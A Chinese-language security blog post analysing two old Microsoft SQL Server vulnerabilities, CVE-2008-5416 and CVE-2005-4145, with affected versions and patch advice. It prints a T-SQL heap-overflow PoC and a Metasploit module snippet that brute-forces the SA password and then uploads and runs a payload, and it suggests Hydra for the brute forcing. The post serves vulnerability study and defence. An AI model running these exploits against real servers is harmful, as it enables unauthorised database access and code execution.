Microsoft SQL Server漏洞浅析

栏目: 数据库 · 发布时间: 6年前

内容简介:0x01 Microsoft SQL Server数据库简介Microsoft SQL Server是微软公司推出的关系型数据库管理系统,因其具有使用方便与可伸缩性好,且与相关软件集成程度高等优点,从而被广泛使用。Microsoft SQL Server 数据库引擎为关系型数据和结构化数据提供了更安全可靠的存储功能,可以构建和管理对高可用和高性能有需求的业务业务场景。目前Microsoft SQL Server数据库在全球的应用量也比较靠前,据统计,在全球范围内对互联网开放Microsoft SQL Se

0x01 Microsoft SQL Server数据库简介

Microsoft SQL Server是微软公司推出的关系型数据库管理系统,因其具有使用方便与可伸缩性好,且与相关软件集成程度高等优点,从而被广泛使用。Microsoft SQL Server 数据库引擎为关系型数据和结构化数据提供了更安全可靠的存储功能,可以构建和管理对高可用和高性能有需求的业务业务场景。

目前Microsoft SQL Server数据库在全球的应用量也比较靠前,据统计,在全球范围内对互联网开放Microsoft SQL Server数据库服务的资产数量多达237,065台,发现中国地区对外开放的Microsoft SQL Server数据库服务数量排名第一,数量为75793台,接近全球总量的30%。排名第二与第三的分别是美国与荷兰地区,其对外开放的Microsoft SQL Server数据库服务数量分别为35,965台和33,664台。由此看来,国内使用Microsoft SQL Server数据库的用户很广泛,对Microsoft SQL Server数据库的漏洞防范就显得尤为重要了。

Microsoft SQL Server漏洞浅析

(统计数据仅为对互联网开放的资产,本数据来源于FOFA。)

0x02 Microsoft SQL Server漏洞概述

近几年Microsoft SQL Server数据库爆发的漏洞数量与其它类型数据库相比,所暴露出来的漏洞相对较少。在此,挑选两个可利用性高,且具有代表性的漏洞进行分析,分析列表如下:

Microsoft SQL Server漏洞浅析

0x03 Microsoft SQL Server漏洞分析

1、CVE-2008-5416 漏洞分析

一、漏洞信息:

Microsoft SQL Server漏洞浅析

二、漏洞概述:

Microsoft SQL Server是一款流行的 SQL 数据库系统。Microsoft SQL Server的sp_replwritetovarbin扩展存储过程中存在堆溢出漏洞,如果远程攻击者在参数中提供了未初始化变量的话,就可以触发这个溢出,向可控的位置写入内存,导致已有漏洞SQL Server进程的权限执行任意代码。在默认的配置中,任何用户都可以访问sp_replwritetovarbin过程。通过认证的用户可以通过直接的数据库连接或SQL注入来利用这个漏洞。

三、漏洞影响:

· Microsoft SQL Server 受CVE-2008-5416漏洞影响的版本如下:

· MSSQL 2000 / MSDE SP0 (8.00.194)

· MSSQL 2000 / MSDE SP1 (8.00.384)

· MSSQL 2000 / MSDE SP2 (8.00.534)

· MSSQL 2000 / MSDE SP3 (8.00.760)

· MSSQL 2000 / MSDE SP4 (8.00.2039)

· MSSQL 2005 SP0 (9.00.1399.06)

· MSSQL 2005 SP1 (9.00.2047.00)

·MSSQL 2005 SP2 (9.00.3042.00)

四、漏洞分析:

1、CVE-2008-5416漏洞PoC利用代码分析:

我们从互联网中找到了CVE-2008-5416漏洞PoC,如下是漏洞PoC利用代码片段:

DECLARE @buf NVARCHAR(4000),
@val NVARCHAR(4),
@counter INT
 
SET @buf = '
declare @retcode int,
@end_offset int,
@vb_buffer varbinary,
@vb_bufferlen int,
@buf nvarchar;
exec master.dbo.sp_replwritetovarbin 1,
  @end_offset output,
  @vb_buffer output,
  @vb_bufferlen output,'''
 
SET @val = CHAR(0x41)
 
SET @counter = 0
WHILE @counter < 3000
BEGIN
  SET @counter = @counter + 1
  SET @buf = @buf + @val
END
 
SET @buf = @buf + ''',''1'',''1'',''1'',
''1'',''1'',''1'',''1'',''1'',''1'''
 
EXEC master..sp_executesql @buf

通过PoC代码可以看出,先定义未初始化的自定义变量,然后传入超长数据段(数据段中可构造恶意攻击代码),通过sp_replwritetovarbin扩展在存储过程中进行堆溢出,将构造的攻击代码写入内存并执行。

2、CVE-2008-5416漏洞攻击流量分析:

攻击者TDS协议对靶机发起远程登陆认证请求,因为该漏洞只有远程认证成功后才可以进一步被利用。如下所示:

Microsoft SQL Server漏洞浅析

当登陆请求认证成功后,进一步查询数据库服务器的版本信息。如下所示:

Microsoft SQL Server漏洞浅析

在确定数据库系统的版本信息后,再进一步选择对应的攻击PayLoad载荷,进行存储过程溢出攻击。如下所示:

Microsoft SQL Server漏洞浅析

五、漏洞验证:

通过Metasploit渗透测试框架对存在CVE-2008-5416漏洞的靶机进行测试,发现可以利用成功。如下图所示:

Microsoft SQL Server漏洞浅析

六、漏洞修复建议:

Microsoft已经为此发布了一个安全公告(MS09-004)以及相应补丁。链接如下:

https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2009/ms09-004

2、CVE-2005-4145漏洞分析:

一、漏洞信息:

· 漏洞名称:Lyris ListManager MSDE Weak SA Password Vulnerability

· 漏洞编号:CVE-2005-4145

· 漏洞类型:Weak Password Vulnerability

二、漏洞概述:

Lyris_technologies_inc Listmanager是Microsoft SQL Server MSDE中的一款重要组件,由于Lyris_technologies_inc Listmanager 5.0 – 8.9b版本中存在将数据库的SA帐户配置为使用具有小型搜索空间的密码的设计缺陷,导致攻击者可远程通过暴力破解攻击获取Microsoft SQL Server数据库的访问权。

三、漏洞影响:

Lyris_technologies_inc Listmanager受CVE-2005-4145漏洞影响的版本如下:

· Lyris_technologies_inc Listmanager 5.0  

· Lyris_technologies_inc Listmanager 6.0  

· Lyris_technologies_inc Listmanager 7.0  

· Lyris_technologies_inc Listmanager 8.0  

· Lyris_technologies_inc Listmanager 8.8a

四、漏洞分析:

1、漏洞PoC代码分析:

我们从互联网中找到了CVE-2005-4145漏洞PoC,如下是漏洞PoC利用代码片段:

def exploit
# New installations use a randomly generated suffix like "lyris629dAe536F"
    pass = nil
    while(true)
      print_status("Trying to authenticate with password 'lminstall'...")
      if(mssql_login('sa', 'lminstall'))
        pass = 'lminstall'
        break
      end
 
      print_status("Trying to authenticate with passwords 'lyris1' to 'lyris65535'...")
      1.upto(65535) do |pid|
        if(pid % 1000 == 0)
          print_status(" >> Completed #{pid} of 65535 authentication requests")
        end
 
        if(mssql_login('sa', "lyris#{pid}"))
          pass = "lyris#{pid}"
          break
        end
      end
      print_status("This system does not appear to be exploitable")
      return
    end
 
    print_status("")
    print_good("Successfully authenticated to #{rhost}:#{rport} with user 'sa' and password '#{pass}'")
    print_status("")
    exe = generate_payload_exe
    mssql_upload_exec(exe)
    handler
    disconnect
  end
end

从上面的漏洞PoC代码可以看出,先尝试使用账号SA,密码lminstall进行尝试登陆,如成功,就执行下面的SQL利用代码,否则,进一步对SA账户进行进程PID暴力枚举来获取登陆权限,如登陆成功,同理,执行下面的SQL利用代码。

2、CVE-2005-4145漏洞PoC数据包分析:

攻击者通过TDS协议对靶机不停的发起远程登陆认证请求,用户名为SA,不停的枚举密码。

Microsoft SQL Server漏洞浅析

五、漏洞验证:

通过Metasploit渗透测试框架对存在CVE-2005-4145漏洞的靶机进行测试,发现可以利用成功。如下图所示:

Microsoft SQL Server漏洞浅析

技巧提示:CVE-2005-4145漏洞PoC通过默认账号或指定账号的方式来进行枚举测试,由于代码实现比较简单,也比较鸡肋。我们可自行通过Hydra等 工具 枚举成功后,再将枚举成功的值填写Password字段中,然后进一步快速深度利用。

六、漏洞修复建议:

目前,官方已经在Lyris_technologies_inc Listmanager 8.9b版本修复了此漏洞,可自行升级到8.9b及以上版本。

0x04结语

通过对Microsoft SQL Server进行一些列的梳理和分析,可以从以下几个维度进行归纳和总结:

1、高危漏洞主要分布在:Microsoft SQL Server 7、Microsoft SQL Server 2000、Microsoft SQL Server 2005这三个版本。

2、影响范围比较广的漏洞类型有:缓冲区溢出漏洞、弱密码、权限提升、拒绝服务等四种。

3、Microsoft SQL Server高危漏洞的触发条件比较苛刻,基本上都需要先通过账号进行登陆才能进一步利用。

4、Microsoft SQL Server类漏洞比较集中爆发的时期是1997年至2005年这8年。随着微软对安全性越来越重视,在随后发布的Microsoft SQL Server 2008及之后版本中存在的高危安全性问题越来越少。


以上所述就是小编给大家介绍的《Microsoft SQL Server漏洞浅析》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

大数据供应链

大数据供应链

娜达·R·桑德斯 (Nada R. Sanders) / 丁晓松 / 中国人民大学出版社 / 2015-7-1 / CNY 55.00

第一本大数据供应链落地之道的权威著作,全球顶级供应链管理专家娜达·桑德斯博士聚焦传统供应链模式向大数据转型,助力工业4.0时代智能供应链构建。 在靠大数据驱动供应链处于领先地位的企业中,45% 是零售商,如沃尔玛、亚马逊,而22%是快消企业,如戴尔电脑。他们都前所未有地掌控了自己的供应链。在库存管理、订单履行率、原材料和产品交付上具有更为广阔的视野。利用具有预见性的大数据分析结果,可以使供需......一起来看看 《大数据供应链》 这本书的介绍吧!

CSS 压缩/解压工具
CSS 压缩/解压工具

在线压缩/解压 CSS 代码

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器

RGB CMYK 转换工具
RGB CMYK 转换工具

RGB CMYK 互转工具